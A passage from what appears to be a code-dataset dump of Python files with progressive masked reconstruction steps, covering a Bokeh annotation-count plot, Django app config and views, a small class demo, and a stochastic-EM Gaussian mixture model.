plot_totals(summary)\nshow(totals)\n",
"step-5": "import json\n\nfrom bokeh.plotting import figure, output_file\nfrom bokeh.io import show\nfrom bokeh.palettes import inferno\nfrom bokeh.models import ColumnDataSource, FactorRange\nfrom bokeh.transform import factor_cmap\nfrom bokeh.models import HoverTool\n# from bokeh.io import export_svgs\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, \"r\").read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary[\"ontology_events\"]:\n print(o)\n d[o] = summary[\"ontology_events\"][o].get(\n 'description', summary[\"ontology_events\"][o]['method']) + '_' + str(o)\n return(d)\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [],\n 'rxns': [],\n 'terms': []}\n\n # genes\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n\n # terms\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n\n # rxns\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n\n # sums\n events = []\n types = ['genes', 'terms', 'rxns']\n\n gene_counts = []\n rxn_counts = []\n term_counts = []\n\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n\n data = {'events': events,\n 'genes': gene_counts,\n 'terms': term_counts,\n 'rxns': rxn_counts\n }\n\n x = [(event, type) for event in events for type in types]\n\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n\n p = figure(y_range=FactorRange(*x),\n plot_height=400,\n plot_width=1000,\n title=\"Unique Counts per Annotation Event\",\n tools=\"wheel_zoom,box_zoom,reset,save\")\n\n p.hbar(y='x',\n right='counts',\n height=0.9,\n source=source,\n line_color=\"black\",\n fill_color=factor_cmap('x',\n palette=inferno(len(types)),\n factors=types,\n start=1,\n end=2))\n\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = \"horizontal\"\n p.yaxis.subgroup_label_orientation = \"horizontal\"\n p.yaxis.group_label_orientation = \"horizontal\"\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = \"12pt\"\n p.yaxis.major_label_text_font_size = \"12pt\"\n p.yaxis.group_text_font_size = \"12pt\"\n p.add_tools(HoverTool(tooltips=[(\"Type\", \"@x\"), (\"Count\", \"@counts\")]))\n\n return(p)\n\n\n#summary = read_summary(\"PT19DW.5.json\")\nsummary = read_summary(\"PT19DW.7.json\")\n\noutput_file(\"totals.html\", title=\"Totals\")\ntotals = plot_totals(summary)\n\nshow(totals)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.apps import AppConfig
class BoletoGerenciaNetConfig(AppConfig):
name = 'boletogerencianet'
|
normal
|
{
"blob_id": "c2069113f322c97e953fba6b9d21b90a8b13a066",
"index": 2308,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass BoletoGerenciaNetConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass BoletoGerenciaNetConfig(AppConfig):\n name = 'boletogerencianet'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass BoletoGerenciaNetConfig(AppConfig):\n name = 'boletogerencianet'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import ply.lex as lex
print("hello word!")
|
normal
|
{
"blob_id": "84d0c439fcee4339250ced11dd2264740cc20d9c",
"index": 9567,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('hello word!')\n",
"step-3": "import ply.lex as lex\nprint('hello word!')\n",
"step-4": "import ply.lex as lex\n\nprint(\"hello word!\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
class MyClass:
name = "alice"
def set_name(self, name):
self.name = name
def get_name(self):
return self.name
def say_hello(self):
self.greet = "Hello"
def say_hi(self):
print("HI~~~~~")
p1 = MyClass()
p2 = MyClass()
print(p1.name)
p1.set_name("bob")
print(p1.name)
print(p2.name)
# An instance member can only be accessed after it has been set on the instance
p1.say_hello()
print(p1.greet)
# Because the method is called through the class itself, a value for the self parameter must be passed explicitly
MyClass.say_hi("gg")
|
normal
|
{
"blob_id": "babb5ac680c74e19db5c86c2c3323e8285d169ff",
"index": 9939,
"step-1": "class MyClass:\n <mask token>\n\n def set_name(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n def say_hello(self):\n self.greet = 'Hello'\n\n def say_hi(self):\n print('HI~~~~~')\n\n\n<mask token>\n",
"step-2": "class MyClass:\n name = 'alice'\n\n def set_name(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n def say_hello(self):\n self.greet = 'Hello'\n\n def say_hi(self):\n print('HI~~~~~')\n\n\n<mask token>\n",
"step-3": "class MyClass:\n name = 'alice'\n\n def set_name(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n def say_hello(self):\n self.greet = 'Hello'\n\n def say_hi(self):\n print('HI~~~~~')\n\n\n<mask token>\nprint(p1.name)\np1.set_name('bob')\nprint(p1.name)\nprint(p2.name)\np1.say_hello()\nprint(p1.greet)\nMyClass.say_hi('gg')\n",
"step-4": "class MyClass:\n name = 'alice'\n\n def set_name(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n def say_hello(self):\n self.greet = 'Hello'\n\n def say_hi(self):\n print('HI~~~~~')\n\n\np1 = MyClass()\np2 = MyClass()\nprint(p1.name)\np1.set_name('bob')\nprint(p1.name)\nprint(p2.name)\np1.say_hello()\nprint(p1.greet)\nMyClass.say_hi('gg')\n",
"step-5": "class MyClass:\n name = \"alice\"\n \n def set_name(self, name):\n self.name = name\n \n def get_name(self):\n return self.name\n \n def say_hello(self):\n self.greet = \"Hello\"\n \n def say_hi(self):\n print(\"HI~~~~~\")\n \n\n\np1 = MyClass()\np2 = MyClass()\n\nprint(p1.name)\np1.set_name(\"bob\")\nprint(p1.name)\n\nprint(p2.name)\n\n# 인스턴스 멤버를 적용한후에 그 인스턴스 멤버에 접근 할 수 있다\np1.say_hello()\nprint(p1.greet)\n\n#클래스 메서드를 클래스. 으로 호출 했기 떄문에 self 파라미터를 하나 넘겨 줘야 한다 \nMyClass.say_hi(\"gg\")\n\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
"""Gaussian mixture model, with Stochastic EM algorithm."""
import numpy as np
from sklearn.mixture.gaussian_mixture import _estimate_gaussian_parameters, _compute_precision_cholesky
from Core.gllim import MyGMM
class SEMGaussianMixture(MyGMM):
    """Note: the variable Y is used for the observations, instead of X as in the parent class."""
def _compute_Z_conditionnal_density(self,Y):
"""
        Computes the conditional probabilities of Z_i given Y_i
        :param Y: Observations (n_samples,n_features)
        :return: row-stochastic matrix (n_samples,n_components)
"""
proba_cond = np.exp(self._estimate_weighted_log_prob(Y)) # Pi_k * g_k(yi)
s = proba_cond.sum(axis=1)[:,np.newaxis] # sum_k (Pi_k * g_k(yi))
        return proba_cond / s  # normalise each row
def _draw_conditionnal_Z(self,Y):
"""
        Draws a sample of Z given Y
        :param Y: Observations (n_samples, n_features)
        :return: Z (n_samples,n_components) where Zik = 1 iff Zi equals ek
"""
M = self._compute_Z_conditionnal_density(Y)
s = M.cumsum(axis=1)
r = np.random.rand(M.shape[0])[:,np.newaxis]
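        # Inverse-CDF sampling: the chosen component index equals the number of cumulative weights strictly below the uniform draw.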
zi = (s < r).sum(axis=1)[:,np.newaxis]
I = np.empty(M.shape)
I[:] = np.arange(M.shape[1])
return (I == zi).astype(float)
def threshold(self,Z,n_features):
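        # Accept the draw only if every component received at least n_features + 1 samples.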
pik = Z.sum(axis=0)
return (pik >= (n_features + 1)).prod()
def _m_step(self, Y, log_resp):
"""M step.
Parameters
----------
Y : array-like, shape (n_samples, n_features)
log_resp : array-like, shape (n_samples, n_components)
Logarithm of the posterior probabilities (or responsibilities) of
the point of each sample in Y.
"""
Z = self._draw_conditionnal_Z(Y)
        while not self.threshold(Z,Y.shape[1]):  # threshold condition
Z = self._draw_conditionnal_Z(Y)
print("Ajustement au seuil")
n_samples, _ = Y.shape
self.weights_, self.means_, self.covariances_ = (
_estimate_gaussian_parameters(Y, Z, self.reg_covar,
self.covariance_type))
self.weights_ /= n_samples
self.precisions_cholesky_ = _compute_precision_cholesky(
self.covariances_, self.covariance_type)
self._m_step_callback(Y)
class SAEMGaussianMixture(SEMGaussianMixture):
def _print_verbose_msg_iter_end(self, n_iter, diff_ll):
super()._print_verbose_msg_iter_end(n_iter,diff_ll)
        self.current_iter = n_iter + 1  # next iteration
def _m_step(self, Y, log_resp):
"""M step.
Parameters
----------
Y : array-like, shape (n_samples, n_features)
log_resp : array-like, shape (n_samples, n_components)
Logarithm of the posterior probabilities (or responsibilities) of
the point of each sample in Y.
"""
Z = self._draw_conditionnal_Z(Y)
i = 0
        while i < 10 and not self.threshold(Z, Y.shape[1]):  # threshold condition
Z = self._draw_conditionnal_Z(Y)
i += 1
print("Ajustement au seuil")
n_samples, _ = Y.shape
SEMweights_, SEMmeans_, SEMcovariances_ = (
_estimate_gaussian_parameters(Y, Z, self.reg_covar,
self.covariance_type))
SEMweights_ /= n_samples
EMweights_, EMmeans_, EMcovariances_ = (
_estimate_gaussian_parameters(Y, np.exp(log_resp), self.reg_covar,
self.covariance_type))
EMweights_ /= n_samples
r = self.current_iter
gr = self.gamma(r)
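        # SAEM update: convex combination of the EM and SEM estimates with decreasing step size gamma(r) = 1 / sqrt(r + 1).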
self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_
self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_
self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_
self.precisions_cholesky_ = _compute_precision_cholesky(
self.covariances_, self.covariance_type)
self._m_step_callback(Y)
@staticmethod
def gamma(r):
return 1 / np.sqrt( r + 1)
|
normal
|
{
"blob_id": "39475626b7e3e0f4c8143b300c002a2eb50cc23a",
"index": 9341,
"step-1": "<mask token>\n\n\nclass SEMGaussianMixture(MyGMM):\n <mask token>\n <mask token>\n\n def _draw_conditionnal_Z(self, Y):\n \"\"\"\n Tire un échantillon de loi Z sachant Y\n\n :param Y: Observations (n_samples, n_features)\n :return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek\n \"\"\"\n M = self._compute_Z_conditionnal_density(Y)\n s = M.cumsum(axis=1)\n r = np.random.rand(M.shape[0])[:, np.newaxis]\n zi = (s < r).sum(axis=1)[:, np.newaxis]\n I = np.empty(M.shape)\n I[:] = np.arange(M.shape[1])\n return (I == zi).astype(float)\n\n def threshold(self, Z, n_features):\n pik = Z.sum(axis=0)\n return (pik >= n_features + 1).prod()\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n while not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n self.weights_, self.means_, self.covariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n self.weights_ /= n_samples\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n\nclass SAEMGaussianMixture(SEMGaussianMixture):\n\n def _print_verbose_msg_iter_end(self, n_iter, diff_ll):\n super()._print_verbose_msg_iter_end(n_iter, diff_ll)\n self.current_iter = n_iter + 1\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n i = 0\n while i < 10 and not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n i += 1\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n SEMweights_, SEMmeans_, SEMcovariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n SEMweights_ /= n_samples\n EMweights_, EMmeans_, EMcovariances_ = _estimate_gaussian_parameters(Y,\n np.exp(log_resp), self.reg_covar, self.covariance_type)\n EMweights_ /= n_samples\n r = self.current_iter\n gr = self.gamma(r)\n self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_\n self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_\n self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n @staticmethod\n def gamma(r):\n return 1 / np.sqrt(r + 1)\n",
"step-2": "<mask token>\n\n\nclass SEMGaussianMixture(MyGMM):\n <mask token>\n\n def _compute_Z_conditionnal_density(self, Y):\n \"\"\"\n Calcule les proba conditionnelles de Z_i sachant Y_i\n :param Y: Observations (n_samples,n_features)\n :return: matrice stochastique (en ligne) (n_samples,n_components)\n \"\"\"\n proba_cond = np.exp(self._estimate_weighted_log_prob(Y))\n s = proba_cond.sum(axis=1)[:, np.newaxis]\n return proba_cond / s\n\n def _draw_conditionnal_Z(self, Y):\n \"\"\"\n Tire un échantillon de loi Z sachant Y\n\n :param Y: Observations (n_samples, n_features)\n :return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek\n \"\"\"\n M = self._compute_Z_conditionnal_density(Y)\n s = M.cumsum(axis=1)\n r = np.random.rand(M.shape[0])[:, np.newaxis]\n zi = (s < r).sum(axis=1)[:, np.newaxis]\n I = np.empty(M.shape)\n I[:] = np.arange(M.shape[1])\n return (I == zi).astype(float)\n\n def threshold(self, Z, n_features):\n pik = Z.sum(axis=0)\n return (pik >= n_features + 1).prod()\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n while not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n self.weights_, self.means_, self.covariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n self.weights_ /= n_samples\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n\nclass SAEMGaussianMixture(SEMGaussianMixture):\n\n def _print_verbose_msg_iter_end(self, n_iter, diff_ll):\n super()._print_verbose_msg_iter_end(n_iter, diff_ll)\n self.current_iter = n_iter + 1\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n i = 0\n while i < 10 and not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n i += 1\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n SEMweights_, SEMmeans_, SEMcovariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n SEMweights_ /= n_samples\n EMweights_, EMmeans_, EMcovariances_ = _estimate_gaussian_parameters(Y,\n np.exp(log_resp), self.reg_covar, self.covariance_type)\n EMweights_ /= n_samples\n r = self.current_iter\n gr = self.gamma(r)\n self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_\n self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_\n self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n @staticmethod\n def gamma(r):\n return 1 / np.sqrt(r + 1)\n",
"step-3": "<mask token>\n\n\nclass SEMGaussianMixture(MyGMM):\n \"\"\"Remarque : on utilise la variable Y pour les observations, au lieu de X dans la classe parente.\"\"\"\n\n def _compute_Z_conditionnal_density(self, Y):\n \"\"\"\n Calcule les proba conditionnelles de Z_i sachant Y_i\n :param Y: Observations (n_samples,n_features)\n :return: matrice stochastique (en ligne) (n_samples,n_components)\n \"\"\"\n proba_cond = np.exp(self._estimate_weighted_log_prob(Y))\n s = proba_cond.sum(axis=1)[:, np.newaxis]\n return proba_cond / s\n\n def _draw_conditionnal_Z(self, Y):\n \"\"\"\n Tire un échantillon de loi Z sachant Y\n\n :param Y: Observations (n_samples, n_features)\n :return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek\n \"\"\"\n M = self._compute_Z_conditionnal_density(Y)\n s = M.cumsum(axis=1)\n r = np.random.rand(M.shape[0])[:, np.newaxis]\n zi = (s < r).sum(axis=1)[:, np.newaxis]\n I = np.empty(M.shape)\n I[:] = np.arange(M.shape[1])\n return (I == zi).astype(float)\n\n def threshold(self, Z, n_features):\n pik = Z.sum(axis=0)\n return (pik >= n_features + 1).prod()\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n while not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n self.weights_, self.means_, self.covariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n self.weights_ /= n_samples\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n\nclass SAEMGaussianMixture(SEMGaussianMixture):\n\n def _print_verbose_msg_iter_end(self, n_iter, diff_ll):\n super()._print_verbose_msg_iter_end(n_iter, diff_ll)\n self.current_iter = n_iter + 1\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n i = 0\n while i < 10 and not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n i += 1\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n SEMweights_, SEMmeans_, SEMcovariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n SEMweights_ /= n_samples\n EMweights_, EMmeans_, EMcovariances_ = _estimate_gaussian_parameters(Y,\n np.exp(log_resp), self.reg_covar, self.covariance_type)\n EMweights_ /= n_samples\n r = self.current_iter\n gr = self.gamma(r)\n self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_\n self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_\n self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n @staticmethod\n def gamma(r):\n return 1 / np.sqrt(r + 1)\n",
"step-4": "<mask token>\nimport numpy as np\nfrom sklearn.mixture.gaussian_mixture import _estimate_gaussian_parameters, _compute_precision_cholesky\nfrom Core.gllim import MyGMM\n\n\nclass SEMGaussianMixture(MyGMM):\n \"\"\"Remarque : on utilise la variable Y pour les observations, au lieu de X dans la classe parente.\"\"\"\n\n def _compute_Z_conditionnal_density(self, Y):\n \"\"\"\n Calcule les proba conditionnelles de Z_i sachant Y_i\n :param Y: Observations (n_samples,n_features)\n :return: matrice stochastique (en ligne) (n_samples,n_components)\n \"\"\"\n proba_cond = np.exp(self._estimate_weighted_log_prob(Y))\n s = proba_cond.sum(axis=1)[:, np.newaxis]\n return proba_cond / s\n\n def _draw_conditionnal_Z(self, Y):\n \"\"\"\n Tire un échantillon de loi Z sachant Y\n\n :param Y: Observations (n_samples, n_features)\n :return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek\n \"\"\"\n M = self._compute_Z_conditionnal_density(Y)\n s = M.cumsum(axis=1)\n r = np.random.rand(M.shape[0])[:, np.newaxis]\n zi = (s < r).sum(axis=1)[:, np.newaxis]\n I = np.empty(M.shape)\n I[:] = np.arange(M.shape[1])\n return (I == zi).astype(float)\n\n def threshold(self, Z, n_features):\n pik = Z.sum(axis=0)\n return (pik >= n_features + 1).prod()\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n while not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n self.weights_, self.means_, self.covariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n self.weights_ /= n_samples\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n\nclass SAEMGaussianMixture(SEMGaussianMixture):\n\n def _print_verbose_msg_iter_end(self, n_iter, diff_ll):\n super()._print_verbose_msg_iter_end(n_iter, diff_ll)\n self.current_iter = n_iter + 1\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n i = 0\n while i < 10 and not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n i += 1\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n SEMweights_, SEMmeans_, SEMcovariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n SEMweights_ /= n_samples\n EMweights_, EMmeans_, EMcovariances_ = _estimate_gaussian_parameters(Y,\n np.exp(log_resp), self.reg_covar, self.covariance_type)\n EMweights_ /= n_samples\n r = self.current_iter\n gr = self.gamma(r)\n self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_\n self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_\n self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n @staticmethod\n def gamma(r):\n return 1 / np.sqrt(r + 1)\n",
"step-5": "\"\"\"Gaussian mixture model, with Stochastic EM algorithm.\"\"\"\n\nimport numpy as np\nfrom sklearn.mixture.gaussian_mixture import _estimate_gaussian_parameters, _compute_precision_cholesky\n\nfrom Core.gllim import MyGMM\n\n\nclass SEMGaussianMixture(MyGMM):\n \"\"\"Remarque : on utilise la variable Y pour les observations, au lieu de X dans la classe parente.\"\"\"\n\n def _compute_Z_conditionnal_density(self,Y):\n \"\"\"\n Calcule les proba conditionnelles de Z_i sachant Y_i\n :param Y: Observations (n_samples,n_features)\n :return: matrice stochastique (en ligne) (n_samples,n_components)\n \"\"\"\n proba_cond = np.exp(self._estimate_weighted_log_prob(Y)) # Pi_k * g_k(yi)\n s = proba_cond.sum(axis=1)[:,np.newaxis] # sum_k (Pi_k * g_k(yi))\n return proba_cond / s #On normalise\n\n def _draw_conditionnal_Z(self,Y):\n \"\"\"\n Tire un échantillon de loi Z sachant Y\n\n :param Y: Observations (n_samples, n_features)\n :return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek\n \"\"\"\n M = self._compute_Z_conditionnal_density(Y)\n s = M.cumsum(axis=1)\n r = np.random.rand(M.shape[0])[:,np.newaxis]\n zi = (s < r).sum(axis=1)[:,np.newaxis]\n I = np.empty(M.shape)\n I[:] = np.arange(M.shape[1])\n return (I == zi).astype(float)\n\n def threshold(self,Z,n_features):\n pik = Z.sum(axis=0)\n return (pik >= (n_features + 1)).prod()\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n while not self.threshold(Z,Y.shape[1]): #Condition de seuil\n Z = self._draw_conditionnal_Z(Y)\n print(\"Ajustement au seuil\")\n\n n_samples, _ = Y.shape\n self.weights_, self.means_, self.covariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar,\n self.covariance_type))\n self.weights_ /= n_samples\n self.precisions_cholesky_ = _compute_precision_cholesky(\n self.covariances_, self.covariance_type)\n\n self._m_step_callback(Y)\n\nclass SAEMGaussianMixture(SEMGaussianMixture):\n\n def _print_verbose_msg_iter_end(self, n_iter, diff_ll):\n super()._print_verbose_msg_iter_end(n_iter,diff_ll)\n self.current_iter = n_iter + 1 #Prochaine itération\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n i = 0\n while i < 10 and not self.threshold(Z, Y.shape[1]): # Condition de seuil\n Z = self._draw_conditionnal_Z(Y)\n i += 1\n print(\"Ajustement au seuil\")\n\n n_samples, _ = Y.shape\n SEMweights_, SEMmeans_, SEMcovariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar,\n self.covariance_type))\n SEMweights_ /= n_samples\n\n EMweights_, EMmeans_, EMcovariances_ = (\n _estimate_gaussian_parameters(Y, np.exp(log_resp), self.reg_covar,\n self.covariance_type))\n EMweights_ /= n_samples\n\n r = self.current_iter\n gr = self.gamma(r)\n self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_\n self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_\n self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_\n\n self.precisions_cholesky_ = _compute_precision_cholesky(\n self.covariances_, self.covariance_type)\n\n 
self._m_step_callback(Y)\n\n @staticmethod\n def gamma(r):\n return 1 / np.sqrt( r + 1)\n\n",
"step-ids": [
8,
9,
10,
11,
12
]
}
|
[
8,
9,
10,
11,
12
] |
import pdb
from django.db.models import Count
from django.shortcuts import render_to_response, redirect
from django.contrib.auth.decorators import login_required
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse  # used by the redirect in create()
from django.template import RequestContext
from models import *
from forms import *
from django.http import HttpResponse


def list(request):
    # List all techniques, most-illustrated first.
    techniques = Technique.objects.annotate(num_images=Count('images')
        ).order_by('-num_images')
    return render_to_response('technique/list.html', {'techniques':
        techniques}, RequestContext(request))


def view(request, pk):
    # Show a single technique together with its related techniques.
    t = Technique.objects.get(pk=pk)
    related = filter(lambda x: x, [t2 for t2 in t.starting_at.all()] + [t2 for
        t2 in t.ending_at.all()] + [t2 for t2 in t.children.all()] + [t.
        start, t.end])
    return render_to_response('technique/view.html', {'t': t, 'related':
        related}, RequestContext(request))


@login_required
def create(request, pk=None):
    # Create a new technique, or edit an existing one when pk is given;
    # the inline image formset is validated and saved with the technique.
    if pk:
        t = Technique.objects.get(pk=pk)
    else:
        t = Technique(created_by=request.user)
    if request.method == 'POST':
        f = TechniqueForm(request.POST, instance=t)
        image_formset = TechniqueImageFormset(request.POST, request.FILES,
            instance=t)
        if f.is_valid():
            t = f.save(commit=False)
            image_formset = TechniqueImageFormset(request.POST, request.
                FILES, instance=t)
            if image_formset.is_valid():
                t.save()
                for i in image_formset.save(commit=False):
                    i.created_by = request.user
                    i.technique = t
                    i.save()
                return redirect(reverse('technique.views.view', args=(t.pk,)))
    else:
        f = TechniqueForm(instance=t)
        image_formset = TechniqueImageFormset(instance=t)
    return render_to_response('technique/create.html', {'f': f,
        'image_formset': image_formset}, RequestContext(request))
normal
|
{
"blob_id": "565e994576a57f8bbdcb201f2439bd7e595fa53e",
"index": 9679,
"step-1": "<mask token>\n\n\ndef list(request):\n techniques = Technique.objects.annotate(num_images=Count('images')\n ).order_by('-num_images')\n return render_to_response('technique/list.html', {'techniques':\n techniques}, RequestContext(request))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef list(request):\n techniques = Technique.objects.annotate(num_images=Count('images')\n ).order_by('-num_images')\n return render_to_response('technique/list.html', {'techniques':\n techniques}, RequestContext(request))\n\n\ndef view(request, pk):\n t = Technique.objects.get(pk=pk)\n related = filter(lambda x: x, [t2 for t2 in t.starting_at.all()] + [t2 for\n t2 in t.ending_at.all()] + [t2 for t2 in t.children.all()] + [t.\n start, t.end])\n return render_to_response('technique/view.html', {'t': t, 'related':\n related}, RequestContext(request))\n\n\n<mask token>\n",
